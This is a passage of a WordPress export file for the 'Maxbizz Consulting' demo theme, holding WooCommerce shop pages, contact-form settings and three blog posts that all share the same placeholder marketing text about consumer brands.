ont_family";i:1;s:20:"typography_font_size";i:1;s:27:"typography_font_size_mobile";i:1;s:22:"typography_font_weight";i:1;s:22:"typography_line_height";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:14:"_margin_tablet";i:1;s:15:"_padding_mobile";i:1;}}}}s:11:"ivideopopup";a:3:{s:5:"count";i:1;s:15:"control_percent";i:3;s:8:"controls";a:2:{s:7:"content";a:1:{s:15:"content_section";a:3:{s:5:"align";i:1;s:5:"vlink";i:1;s:7:"caption";i:1;}}s:5:"style";a:2:{s:13:"style_section";a:3:{s:9:"btn_color";i:1;s:16:"btn_border_color";i:1;s:10:"btn_circle";i:1;}s:15:"caption_section";a:1:{s:13:"caption_color";i:1;}}}}s:8:"icounter";a:3:{s:5:"count";i:4;s:15:"control_percent";i:5;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:2:{s:5:"title";i:4;s:6:"number";i:4;}}s:5:"style";a:1:{s:21:"style_content_section";a:10:{s:12:"number_color";i:4;s:28:"number_typography_typography";i:4;s:29:"number_typography_font_family";i:4;s:27:"number_typography_font_size";i:4;s:29:"number_typography_font_weight";i:4;s:11:"title_color";i:4;s:27:"title_typography_typography";i:4;s:28:"title_typography_font_family";i:4;s:28:"title_typography_font_weight";i:4;s:28:"title_typography_line_height";i:4;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:15:"_padding_tablet";i:2;s:15:"_padding_mobile";i:1;}}}}s:8:"ipfilter";a:3:{s:5:"count";i:1;s:15:"control_percent";i:4;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:3:{s:11:"project_num";i:1;s:9:"load_more";i:1;s:6:"layout";i:1;}}s:5:"style";a:1:{s:21:"overlay_style_section";a:7:{s:13:"overlay_align";i:1;s:8:"position";i:1;s:18:"overlay_background";i:1;s:9:"show_icon";i:1;s:13:"title_spacing";i:1;s:10:"cat_hcolor";i:1;s:9:"cat_color";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}s:14:"itestimonials2";a:3:{s:5:"count";i:1;s:15:"control_percent";i:2;s:8:"controls";a:2:{s:7:"content";a:1:{s:20:"section_testimonials";a:4:{s:12:"testi_slider";i:1;s:6:"arrows";i:1;s:4:"dots";i:1;s:4:"loop";i:1;}}s:5:"style";a:2:{s:9:"style_nav";a:1:{s:13:"arrow_spacing";i:1;}s:13:"style_general";a:1:{s:14:"tcontent_color";i:1;}}}}s:13:"ipostcarousel";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:2:{s:8:"post_num";i:1;s:4:"dots";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}s:5:"style";a:1:{s:11:"posts_style";a:1:{s:10:"meta_color";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Cart</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/cart/</link>
		<pubDate>Thu, 01 Oct 2020 10:12:45 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/cart/</guid>
		<description></description>
		<content:encoded><![CDATA[<!-- wp:shortcode -->
[woocommerce_cart]
<!-- /wp:shortcode -->]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1165</wp:post_id>
		<wp:post_date><![CDATA[2020-10-01 10:12:45]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-10-01 10:12:45]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[cart]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[page]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[page-templates/shop-page.php]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[page_layout]]></wp:meta_key>
		<wp:meta_value><![CDATA[full-content]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_switch]]></wp:meta_key>
		<wp:meta_value><![CDATA[0]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[is_trans]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[#ffffff]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Checkout</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/checkout/</link>
		<pubDate>Thu, 01 Oct 2020 10:12:45 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/checkout/</guid>
		<description></description>
		<content:encoded><![CDATA[<!-- wp:shortcode -->
[woocommerce_checkout]
<!-- /wp:shortcode -->]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1166</wp:post_id>
		<wp:post_date><![CDATA[2020-10-01 10:12:45]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-10-01 10:12:45]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[checkout]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[page]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[page-templates/shop-page.php]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[page_layout]]></wp:meta_key>
		<wp:meta_value><![CDATA[full-content]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_switch]]></wp:meta_key>
		<wp:meta_value><![CDATA[0]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[is_trans]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[#ffffff]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>My account</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/my-account/</link>
		<pubDate>Thu, 01 Oct 2020 10:12:45 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/my-account/</guid>
		<description></description>
		<content:encoded><![CDATA[<!-- wp:shortcode -->[woocommerce_my_account]<!-- /wp:shortcode -->]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1167</wp:post_id>
		<wp:post_date><![CDATA[2020-10-01 10:12:45]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-10-01 10:12:45]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[my-account]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[page]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														</item>
					<item>
		<title>Contact form 1</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/?post_type=wpcf7_contact_form&#038;p=4</link>
		<pubDate>Fri, 16 Oct 2020 09:36:55 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz-consulting/?post_type=wpcf7_contact_form&#038;p=4</guid>
		<description></description>
		<content:encoded><![CDATA[<label> Your Name (required)
    [text* your-name] </label>

<label> Your Email (required)
    [email* your-email] </label>

<label> Subject
    [text your-subject] </label>

<label> Your Message
    [textarea your-message] </label>

[submit "Send"]
Maxbizz Consulting "[your-subject]"
Maxbizz Consulting <wordpress@wpdemo.archiwp.com>
From: [your-name] <[your-email]>
Subject: [your-subject]

Message Body:
[your-message]

-- 
This e-mail was sent from a contact form on Maxbizz Consulting (http://wpdemo.archiwp.com/maxbizz-consulting)
support@oceanthemes.net
Reply-To: [your-email]

0
0

Maxbizz Consulting "[your-subject]"
Maxbizz Consulting <wordpress@wpdemo.archiwp.com>
Message Body:
[your-message]

-- 
This e-mail was sent from a contact form on Maxbizz Consulting (http://wpdemo.archiwp.com/maxbizz-consulting)
[your-email]
Reply-To: support@oceanthemes.net

0
0
Thank you for your message. It has been sent.
There was an error trying to send your message. Please try again later.
One or more fields have an error. Please check and try again.
There was an error trying to send your message. Please try again later.
You must accept the terms and conditions before sending your message.
The field is required.
The field is too long.
The field is too short.]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>4</wp:post_id>
		<wp:post_date><![CDATA[2020-10-16 09:36:55]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-10-16 09:36:55]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[contact-form-1]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[wpcf7_contact_form]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_form]]></wp:meta_key>
		<wp:meta_value><![CDATA[<label> Your Name (required)
    [text* your-name] </label>

<label> Your Email (required)
    [email* your-email] </label>

<label> Subject
    [text your-subject] </label>

<label> Your Message
    [textarea your-message] </label>

[submit "Send"]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_mail]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:8:{s:7:"subject";s:35:"Maxbizz Consulting "[your-subject]"";s:6:"sender";s:49:"Maxbizz Consulting <wordpress@wpdemo.archiwp.com>";s:4:"body";s:201:"From: [your-name] <[your-email]>
Subject: [your-subject]

Message Body:
[your-message]

-- 
This e-mail was sent from a contact form on Maxbizz Consulting (http://wpdemo.archiwp.com/maxbizz-consulting)";s:9:"recipient";s:23:"support@oceanthemes.net";s:18:"additional_headers";s:22:"Reply-To: [your-email]";s:11:"attachments";s:0:"";s:8:"use_html";i:0;s:13:"exclude_blank";i:0;}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_mail_2]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:9:{s:6:"active";b:0;s:7:"subject";s:35:"Maxbizz Consulting "[your-subject]"";s:6:"sender";s:49:"Maxbizz Consulting <wordpress@wpdemo.archiwp.com>";s:4:"body";s:143:"Message Body:
[your-message]

-- 
This e-mail was sent from a contact form on Maxbizz Consulting (http://wpdemo.archiwp.com/maxbizz-consulting)";s:9:"recipient";s:12:"[your-email]";s:18:"additional_headers";s:33:"Reply-To: support@oceanthemes.net";s:11:"attachments";s:0:"";s:8:"use_html";i:0;s:13:"exclude_blank";i:0;}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_messages]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:8:{s:12:"mail_sent_ok";s:45:"Thank you for your message. It has been sent.";s:12:"mail_sent_ng";s:71:"There was an error trying to send your message. Please try again later.";s:16:"validation_error";s:61:"One or more fields have an error. Please check and try again.";s:4:"spam";s:71:"There was an error trying to send your message. Please try again later.";s:12:"accept_terms";s:69:"You must accept the terms and conditions before sending your message.";s:16:"invalid_required";s:22:"The field is required.";s:16:"invalid_too_long";s:22:"The field is too long.";s:17:"invalid_too_short";s:23:"The field is too short.";}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_additional_settings]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_locale]]></wp:meta_key>
		<wp:meta_value><![CDATA[en_US]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>The Future of Retail: Asia’s Ecosystems</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/the-future-of-retail-asias-ecosystems/</link>
		<pubDate>Mon, 24 Feb 2020 09:00:43 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?p=430</guid>
		<description></description>
		<content:encoded><![CDATA[<span class="drop-cap"><span class="drop-cap-letter">N</span></span> ot so long ago, marketing consumer products felt like a genteel game of lawn tennis: Established competitors invested in creative with long lead times, using proven models of TV and big-box retail, alongside trusted agency partners. Today, it’s more like a sprawling contest of mixed martial arts, with new competitors playing by different rules; an unprecedented complexity of channels, <span style="color: #4b83fc;">content and partners; and a step change</span> in speed and ways of working that has punches flying at incumbent consumer products companies.

<span style="color: #1b1d21; font-weight: 600;">Fueling the blur of combat is a radical shift in brand growth models.</span> Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. The same technology advances have dramatically altered the competitive landscape. CMOs can no longer forecast forward their current profit pools only by looking to fill in geographies and nearby product market segments. That process risks ignoring the industry’s disruptive trends, as profit pools shift quickly from products to services to experiences and communities, and as mass products evolve into new segments with accelerating personalization. <em>Growth strategy today requires consumer products companies to look “present forward” and “future back”—to create a faster horse while envisioning the car—in order to define new growth platforms beyond their current products, business model and capabilities.</em>

<img class="alignnone size-full wp-image-417" src="https://maxbizz.s3.amazonaws.com/images/post.jpg" alt="" width="870" height="350" />
<h5><strong>Upgrade Content Creation Capabilities</strong></h5>
Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. <span style="color: #1b1d21; font-weight: 600;">The same technology advances have dramatically</span> altered the competitive landscape. However, the transformation still required across the industry is significant, involving far-reaching changes to consumer products companies’ growth models and the largest buckets of their discretionary spending. And it’s urgent, as consumers and new competitors are moving faster than incumbents can react.
<blockquote>
<p style="text-align: center; line-height: 36px;">“I cannot give you the formula for success, but I can give you the formula for failure. It is: Try to please everybody.”
<cite>DAVID OSWALD</cite></p>
</blockquote>
What’s the right path forward? Reinventing the brand growth model requires more than a reallocation of marketing budget to digital. CMOs need a reassessment of growth platforms and future brand portfolios, a new understanding of the consumer journey, a supporting strategy on data and technology.

<em>The consumer journey has fundamentally changed, and so has the role of the brand manager. Once guardians of the brief to agencies, today they must lead hands-on content generation, data management.</em>]]></content:encoded>
		<excerpt:encoded><![CDATA[Most firms have set up a war room to triage their immediate response to the crisis. But the lack of visibility around future demand complicates efforts to restart stalled portfolio companies...]]></excerpt:encoded>
		<wp:post_id>430</wp:post_id>
		<wp:post_date><![CDATA[2020-02-24 09:00:43]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-02-24 09:00:43]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[open]]></wp:ping_status>
		<wp:post_name><![CDATA[the-future-of-retail-asias-ecosystems]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[post]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="post_tag" nicename="analysis"><![CDATA[analysis]]></category>
		<category domain="category" nicename="business"><![CDATA[business]]></category>
		<category domain="post_tag" nicename="business"><![CDATA[business]]></category>
		<category domain="category" nicename="marketing"><![CDATA[marketing]]></category>
		<category domain="post_format" nicename="post-format-video"><![CDATA[Video]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[#ffffff]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[post_video]]></wp:meta_key>
		<wp:meta_value><![CDATA[https://vimeo.com/87959439]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_old_date]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020-09-04]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_old_slug]]></wp:meta_key>
		<wp:meta_value><![CDATA[in-media-trimming-costs-boosts-value-transform]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_thumbnail_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[438]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[bg_video]]></wp:meta_key>
		<wp:meta_value><![CDATA[432]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Digital Transformation Roadmap: Enablers</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/digital-transformation-roadmap-enablers/</link>
		<pubDate>Wed, 14 Aug 2019 09:02:49 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?p=434</guid>
		<description></description>
		<content:encoded><![CDATA[<span class="drop-cap"><span class="drop-cap-letter">N</span></span> ot so long ago, marketing consumer products felt like a genteel game of lawn tennis: Established competitors invested in creative with long lead times, using proven models of TV and big-box retail, alongside trusted agency partners. Today, it’s more like a sprawling contest of mixed martial arts, with new competitors playing by different rules; an unprecedented complexity of channels, <span style="color: #4b83fc;">content and partners; and a step change</span> in speed and ways of working that has punches flying at incumbent consumer products companies.

<span style="color: #1b1d21; font-weight: 600;">Fueling the blur of combat is a radical shift in brand growth models.</span> Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. The same technology advances have dramatically altered the competitive landscape. CMOs can no longer forecast forward their current profit pools only by looking to fill in geographies and nearby product market segments. That process risks ignoring the industry’s disruptive trends, as profit pools shift quickly from products to services to experiences and communities, and as mass products evolve into new segments with accelerating personalization. <em>Growth strategy today requires consumer products companies to look “present forward” and “future back”—to create a faster horse while envisioning the car—in order to define new growth platforms beyond their current products, business model and capabilities.</em>

<img class="alignnone size-full wp-image-417" src="https://maxbizz.s3.amazonaws.com/images/post.jpg" alt="" width="870" height="350" />
<h5><strong>Upgrade Content Creation Capabilities</strong></h5>
Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. <span style="color: #1b1d21; font-weight: 600;">The same technology advances have dramatically</span> altered the competitive landscape. However, the transformation still required across the industry is significant, involving far-reaching changes to consumer products companies’ growth models and the largest buckets of their discretionary spending. And it’s urgent, as consumers and new competitors are moving faster than incumbents can react.
<blockquote>
<p style="text-align: center; line-height: 36px;">“I cannot give you the formula for success, but I can give you the formula for failure. It is: Try to please everybody.”
<cite>DAVID OSWALD</cite></p>
</blockquote>
What’s the right path forward? Reinventing the brand growth model requires more than a reallocation of marketing budget to digital. CMOs need a reassessment of growth platforms and future brand portfolios, a new understanding of the consumer journey, a supporting strategy on data and technology.

<em>The consumer journey has fundamentally changed, and so has the role of the brand manager. Once guardians of the brief to agencies, today they must lead hands-on content generation, data management.</em>]]></content:encoded>
		<excerpt:encoded><![CDATA[Most firms have set up a war room to triage their immediate response to the crisis. But the lack of visibility around future demand complicates efforts to restart stalled portfolio companies...]]></excerpt:encoded>
		<wp:post_id>434</wp:post_id>
		<wp:post_date><![CDATA[2019-08-14 09:02:49]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2019-08-14 09:02:49]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[open]]></wp:ping_status>
		<wp:post_name><![CDATA[digital-transformation-roadmap-enablers]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[post]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="post_tag" nicename="finance"><![CDATA[finance]]></category>
		<category domain="category" nicename="marketing"><![CDATA[marketing]]></category>
		<category domain="post_format" nicename="post-format-quote"><![CDATA[Quote]]></category>
		<category domain="post_tag" nicename="tips"><![CDATA[tips]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[post_quote]]></wp:meta_key>
		<wp:meta_value><![CDATA[I cannot give you the formula for success, but I can give you the 
formula for failure. It is: Try to please everybody.]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[quote_name]]></wp:meta_key>
		<wp:meta_value><![CDATA[David Oswald]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[#ffffff]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_thumbnail_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[439]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_old_date]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020-09-04]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_old_slug]]></wp:meta_key>
		<wp:meta_value><![CDATA[entering-the-next-phase-of-digital-transformation]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Contactless Payments’ Time Has Come</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/contactless-payments-time-has-come/</link>
		<pubDate>Fri, 04 Sep 2020 09:09:22 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?p=447</guid>
		<description></description>
		<content:encoded><![CDATA[<span class="drop-cap"><span class="drop-cap-letter">N</span></span> ot so long ago, marketing consumer products felt like a genteel game of lawn tennis: Established competitors invested in creative with long lead times, using proven models of TV and big-box retail, alongside trusted agency partners. Today, it’s more like a sprawling contest of mixed martial arts, with new competitors playing by different rules; an unprecedented complexity of channels, <span style="color: #4b83fc;">content and partners; and a step change</span> in speed and ways of working that has punches flying at incumbent consumer products companies.

<span style="color: #1b1d21; font-weight: 600;">Fueling the blur of combat is a radical shift in brand growth models.</span> Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. The same technology advances have dramatically altered the competitive landscape. CMOs can no longer forecast forward their current profit pools only by looking to fill in geographies and nearby product market segments. That process risks ignoring the industry’s disruptive trends, as profit pools shift quickly from products to services to experiences and communities, and as mass products evolve into new segments with accelerating personalization. <em>Growth strategy today requires consumer products companies to look “present forward” and “future back”—to create a faster horse while envisioning the car—in order to define new growth platforms beyond their current products, business model and capabilities.</em>

<img class="alignnone size-full wp-image-417" src="https://maxbizz.s3.amazonaws.com/images/post.jpg" alt="" width="870" height="350" />
<h5><strong>Upgrade Content Creation Capabilities</strong></h5>
Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. <span style="color: #1b1d21; font-weight: 600;">The same technology advances have dramatically</span> altered the competitive landscape. However, the transformation still required across the industry is significant, involving far-reaching changes to consumer products companies’ growth models and the largest buckets of their discretionary spending. And it’s urgent, as consumers and new competitors are moving faster than incumbents can react.
<blockquote>
<p style="text-align: center; line-height: 36px;">“I cannot give you the formula for success, but I can give you the formula for failure. It is: Try to please everybody.”
<cite>DAVID OSWALD</cite></p>
</blockquote>
What’s the right path forward? Reinventing the brand growth model requires more than a reallocation of marketing budget to digital. CMOs need a reassessment of growth platforms and future brand portfolios, a new understanding of the consumer journey, a supporting strategy on data and technology.

<em>The consumer journey has fundamentally changed, and so has the role of the brand manager. Once guardians of the brief to agencies, today they must lead hands-on content generation, data management.</em>]]></content:encoded>
		<excerpt:encoded><![CDATA[Most firms have set up a war room to triage their immediate response to the crisis. But the lack of visibility around future demand complicates efforts to restart stalled portfolio companies...]]></excerpt:encoded>
		<wp:post_id>447</wp:post_id>
		<wp:post_date><![CDATA[2020-09-04 09:09:22]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-04 09:09:22]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[open]]></wp:ping_status>
		<wp:post_name><![CDATA[contactless-payments-time-has-come]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[post]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="category" nicename="business"><![CDATA[business]]></category>
		<category domain="post_tag" nicename="business"><![CDATA[business]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[#ffffff]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_thumbnail_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[448]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Coming Soon Form</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/?post_type=wpcf7_contact_form&#038;p=610</link>
		<pubDate>Wed, 09 Sep 2020 03:52:45 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?post_type=wpcf7_contact_form&#038;p=610</guid>
		<description></description>
		<content:encoded><![CDATA[<div class="cs-form flex-middle">
[email* your-email placeholder "Your Email *"]<button class="octf-btn">Sign Up</button>
</div>
1
Maxbizz "[your-subject]"
Maxbizz 
support@oceanthemes.net
From: [your-name] 
Subject: [your-subject]

Message Body:
[your-message]

-- 
